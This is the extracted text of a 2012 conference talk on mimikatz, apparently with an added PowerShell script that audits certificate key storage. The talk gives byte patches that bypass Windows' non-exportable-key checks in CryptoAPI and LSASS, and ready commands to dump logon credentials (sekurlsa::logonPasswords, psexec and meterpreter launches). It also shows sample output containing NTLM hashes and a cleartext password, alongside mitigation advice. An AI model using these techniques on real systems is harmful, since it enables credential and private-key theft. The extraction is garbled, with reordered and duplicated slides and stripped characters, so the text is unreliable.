	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz crypto::patchcapi – because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 43
  .text:0AC0B7CB  0F 85 33 C7 FF FF   jnz  continue_key_export_or_archive
  .text:0AC0B7CB  90                  nop
  .text:0AC0B7CC  E9 33 C7 FF FF      jmp  continue_key_export_or_archive
  .text:0AC1F749  0F 85 B6 3B FF FF   jnz  continue_key_export_or_archive_prepare
  .text:0AC1F749  90                  nop
  .text:0AC1F74A  E9 B6 3B FF FF      jmp  continue_key_export_or_archive_prepare
mimikatz crypto::patchcapi – demo time!
Import, export, import as not exportable… export!
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 44
mimikatz crypto::patchcapi – limitations
Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 45
mimikatz crypto cng – how it works?
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 46
mimikatz crypto cng – how it's exported? ( level)
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 47
[Diagram: the process calls CNG ("Ask to export Key"), which goes over RPC to the KeyIso service inside the LSASS process (on NT6 a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP); there the key file is DPAPI-decoded ("PLAYSKOOL"), the private key loaded and "Exportable?" checked: yes → exported key; no → NTE_NOT_SUPPORTED]
mimikatz crypto::patchcng – because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to ncrypt!SPCryptExportKey in lsass (keyiso)
This function does all the work to prepare the export and checks if the key is exportable
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 48
mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK ; (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz crypto::patchcng – because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 49
  .text:6C815210  75 1C   jnz  short continue_key_export
  .text:6C815210  EB 1C   jmp  short continue_key_export
mimikatz crypto::patchcng – demo time!
Import, export, import as not exportable… export again!
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 50
mimikatz crypto::patchcng – limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algs than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu? :))
– certutil can…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 51
mimikatz crypto::patchcng – bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 52
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX : La commande s'est terminée correctement.
mimikatz crypto – memo
Some commands
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 53
mimikatz crypto – what we can do?
Exactly the same as for sekurlsa: it will prevent access to accounts/computer
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy :)
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 54
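To apply that advice, an administrator first needs to know which private keys are only protected by a NoExport flag enforced in software (inside rsaenh.dll in the caller, or inside LSASS for the software KSP) and which actually sit in hardware. The PowerShell below is an added example, not part of the slides or of mimikatz; it assumes Windows PowerShell 5.1 on .NET Framework 4.6.1 or later, and the store list and finding labels are mine.

```powershell
# Added example (not from the slides): for every certificate in the machine
# and user "My" stores, report where its private key lives and which component
# enforces its export restriction. Windows PowerShell 5.1 / .NET 4.6.1+ assumed;
# machine keys need an elevated session.
using namespace System.Security.Cryptography
using namespace System.Security.Cryptography.X509Certificates

$softwareKsp = 'Microsoft Software Key Storage Provider'
# The CSPs the talk lists as all being based on rsaenh.dll.
$rsaenhCsps = @(
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider'
)
$softwareProviders = @($softwareKsp) + $rsaenhCsps

function Get-PrivateKeyExposure {
    param([Parameter(Mandatory)][X509Certificate2]$Cert, [string]$Store)

    $r = [ordered]@{
        Store = $Store; Subject = $Cert.Subject; Thumbprint = $Cert.Thumbprint
        KeyApi = 'none'; Provider = ''; Exportable = $false
        Hardware = $false; UiProtected = $false; Finding = 'no private key'
    }
    if (-not $Cert.HasPrivateKey) { return [pscustomobject]$r }

    try {
        # Opens the key through whichever API holds it; a smart-card key may
        # prompt for its PIN at this point.
        $key = [RSACertificateExtensions]::GetRSAPrivateKey($Cert)
        if (-not $key) { $key = [ECDsaCertificateExtensions]::GetECDsaPrivateKey($Cert) }
    } catch {
        $r.Finding = "key open failed: $($_.Exception.Message)"
        return [pscustomobject]$r
    }

    if ($key -is [RSACryptoServiceProvider]) {
        # CryptoAPI key: the CSP reports exportability, UI protection and hardware.
        $csp = $key.CspKeyContainerInfo
        $r.KeyApi = 'CryptoAPI'; $r.Provider = $csp.ProviderName
        $r.Exportable = $csp.Exportable; $r.Hardware = $csp.HardwareDevice
        $r.UiProtected = $csp.Protected
    } elseif ($key -and $key.Key -is [CngKey]) {
        # CNG key: export policy and UI policy come from the KSP's CngKey.
        $cng = $key.Key
        $r.KeyApi = 'CNG'; $r.Provider = $cng.Provider.Provider
        $r.Exportable = [bool]($cng.ExportPolicy -band [CngExportPolicies]::AllowExport)
        $r.Hardware = $softwareProviders -notcontains $r.Provider
        $r.UiProtected = $cng.UIPolicy.ProtectionLevel -ne [CngUIProtectionLevels]::None
    } else {
        $r.Finding = 'unsupported key type'
        return [pscustomobject]$r
    }

    # Where is the export flag enforced? (Finding labels are mine.)
    $r.Finding = if ($rsaenhCsps -contains $r.Provider) {
        'export flag enforced by rsaenh.dll inside the calling process'
    } elseif ($r.Provider -eq $softwareKsp) {
        'export flag enforced by the software KSP inside LSASS (KeyIso)'
    } elseif ($r.Hardware) {
        'key held by a hardware/smart-card provider (what the slide recommends)'
    } else {
        'non-Microsoft software provider: review separately'
    }
    [pscustomobject]$r
}

function Get-CertificateKeyReport {
    param([string[]]$Stores = @('Cert:\LocalMachine\My', 'Cert:\CurrentUser\My'))
    foreach ($s in $Stores) {
        foreach ($c in (Get-ChildItem -Path $s -ErrorAction SilentlyContinue)) {
            Get-PrivateKeyExposure -Cert $c -Store $s
        }
    }
}

Get-CertificateKeyReport | Where-Object KeyApi -ne 'none' |
    Format-Table Store, Subject, KeyApi, Provider, Exportable, Hardware, Finding -AutoSize -Wrap
```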
mimikatz – what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 55
mimikatz – that's all folks!
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy :)
especially if you have written the corresponding slide number
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 56
Blog, Source Code & Contact
blog     http://blog.gentilkiwi.com
mimikatz http://blog.gentilkiwi.com/mimikatz
source   https://code.google.com/p/mimikatz
email    benjamin@gentilkiwi.com
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 57
mimikatz sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to take benefit of its keys when we called it
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the LSASS-initialized keys
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 32
LsaUnprotectMemory
mimikatz sekurlsa – LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses
– RC4
– DESx
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 33
[Diagram: inside the lsass process, lsasrv holds g_pRandomKey (→ BYTE[g_cbRandomKey]), g_cbRandomKey (DWORD, 256), g_pDESXKey (→ BYTE[144]) and g_Feedback (BYTE[8]); mimikatz loads its own lsasrv and copies… these values from lsass into it]
mimikatz sekurlsa – LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 34
[Diagram: inside the lsass process, lsasrv holds InitializationVector (BYTE[16]), h3DesKey and hAesKey (each a PKIWI_BCRYPT_KEY pointing to its KIWI_BCRYPT_KEY_DATA); mimikatz copies… them from lsass into its own lsasrv]

  typedef struct _KIWI_BCRYPT_KEY_DATA {
      DWORD size;
      DWORD tag;
      DWORD type;
      DWORD unk0;
      DWORD unk1;
      DWORD unk2;
      DWORD unk3;
      PVOID unk4;
      BYTE  data;   /* etc. */
  } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

  typedef struct _KIWI_BCRYPT_KEY {
      DWORD size;
      DWORD type;
      PVOID unk0;
      PKIWI_BCRYPT_KEY_DATA cle;
      PVOID unk1;
  } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa – memo
Security Packages / Protection Keys
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 35

Package          Symbols                                 Type
tspkg            tspkg!TSGlobalCredTable                 RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                   LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList      LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList           LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable    RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                 LIST_ENTRY
                 lsasrv!LogonSessionListCount            ULONG

Key      NT 5 Symbols
RC4      lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx     lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key      NT 6 Symbols
         lsasrv!InitializationVector
3DES     lsasrv!h3DesKey
AES      lsasrv!hAesKey
mimikatz sekurlsa – memo
Some commands
  mimikatz privilege::debug sekurlsa::logonPasswords full exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 36
mimikatz 1.0 x64 (RC)	/* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
	msv1_0 :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	wdigest :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	tspkg :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	livessp :
	 n.t. (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most users / Unavailable for computer keys:
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto capi: how it works
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.” – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, … – cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz crypto capi: how it’s exported ( level)
[Diagram: a process calls CryptoAPI and the RSA CSP; the CSP loads the private key (DPAPI decode) and, when asked to export it, checks “Exportable?” – yes: exported key / no: NTE_BAD_KEY_STATE; label: PLAYSKOOL]
mimikatz crypto patch/capi: because I own my process
When we want to export a certificate with its private key (or only the key), the call goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportCertificates
Emplacement : CERT_SYSTEM_STORE_CURRENT_USER\My
 - Benjamin Delpy
   Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
   Provider : Microsoft Enhanced Cryptographic Provider v1.0
   Type : AT_KEYEXCHANGE
   Exportabilité : NON
   Taille clé : 2048
   Export privé dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
   Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz crypto patch/capi: because I own my process
So what? A module in my own process returns that I can’t do something? CryptoAPI is in my memory space, let’s patch it!
I wrote “4” bytes in my memory space:
.text:0AC0B7CB  0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB  90                   nop
.text:0AC0B7CC  E9 33 C7 FF FF       jmp  continue_key_export_or_archive

.text:0AC1F749  0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749  90                   nop
.text:0AC1F74A  E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz crypto patch/capi: demo time
Import, export, import as not exportable… export!
mimikatz crypto patch/capi: limitations
Because:
– I’m lazy
– I’ve seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patch::capi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz crypto cng: how it works
“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.” – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”
This time, key operations are not made in the “user” process context.
Processes use RPC to call “Key Isolation service” (keyiso) functions.
It seems more secure than CryptoAPI… – It is, but it’s not perfect…
mimikatz crypto cng: how it’s exported ( level)
[Diagram: the process calls CNG, which reaches the KeyIso service (LSASS process) over RPC; KeyIso loads the private key (DPAPI decode) and, when asked to export it, checks “Exportable?” – yes: exported key / no: NTE_NOT_SUPPORTED. On NT6, LSASS is a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP; label: PLAYSKOOL]
mimikatz crypto patch/cng: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to ncrypt!SPCryptExportKey inside lsass (keyiso).
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportKeys
[user] Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
   Exportabilité : NON
   Taille clé : 2048
   Export privé dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk : KO
   mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz crypto patch/cng: because sometimes I own LSASS
This time, the checks and the keys are in the LSASS process… And what?
I wrote “1” byte in LSASS memory space…
.text:6C815210  75 1C    jnz  short continue_key_export
.text:6C815210  EB 1C    jmp  short continue_key_export
mimikatz crypto patch/cng: demo time
Import, export, import as not exportable… export again!
mimikatz crypto patch/cng: limitations
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patch::cng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (huh?) – certutil can…
mimikatz crypto patch/cng: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don’t check the export flag before asking for the export can work too
– yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz crypto: memo
Some commands:
mimikatz crypto::patch::capi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patch::capi crypto::patch::cng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patch::cng crypto::patch::capi crypto::exportCertificates crypto::exportKeys exit
Password – PFX files are protected by this password: mimikatz
Keys – When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn’t it?
  • So yes, mimikatz can export it
mimikatz crypto: what we can do
Exactly the same as for sekurlsa: what will prevent it is access control to accounts/computers – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors’ implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
